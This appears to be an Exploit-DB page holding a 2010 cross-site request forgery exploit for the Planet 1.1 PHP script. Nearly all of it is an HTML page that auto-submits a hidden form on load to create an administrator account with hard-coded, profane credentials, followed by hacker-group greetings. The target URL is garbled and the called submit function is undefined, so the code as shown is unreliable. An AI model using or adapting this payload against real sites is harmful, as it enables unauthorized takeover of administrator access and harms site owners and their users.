Exploits
GHDB
Papers
Shellcodes
Search EDB
SearchSploit Manual
Submissions
Online Training
Stats
About Us
Search
# Exploit Title: Planet 1.1 - [CSRF] Add Admin Account # Date: 17-06-2010 # Author: G0D-F4Th3r # Software Link: http://php.femtolayer.com/planet1_1/ # Version: 1.1 # Tested on: http://php.femtolayer.com/planet1_1/ ################################################################################## <html> <body onload="javascript:fireForms()"> <form method="POST" name="form0" action="http://www.site.com/[path]<http://www.site.com/%5Bpath%5D/admincp/staff.php?do=edit&id=1&go=update> /cp/security.php?do=admins"> <input type="hidden" name="username" value="fuck"/> <input type="hidden" name="password" value="fuckpass123"/> <input type="hidden" name="pp" value=""/> <input type="hidden" name="email" value="fuck@mail.com"/> <input type="hidden" name="mobile" value="966555555555"/> <input type="hidden" name="site" value="http://www.femtolayer.com"/> <input type="hidden" name="location" value="US"/> <input type="hidden" name="access" value="1"/> </form> </body> </html> ########################################################################### ############## Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My Friends ################################################################################## #######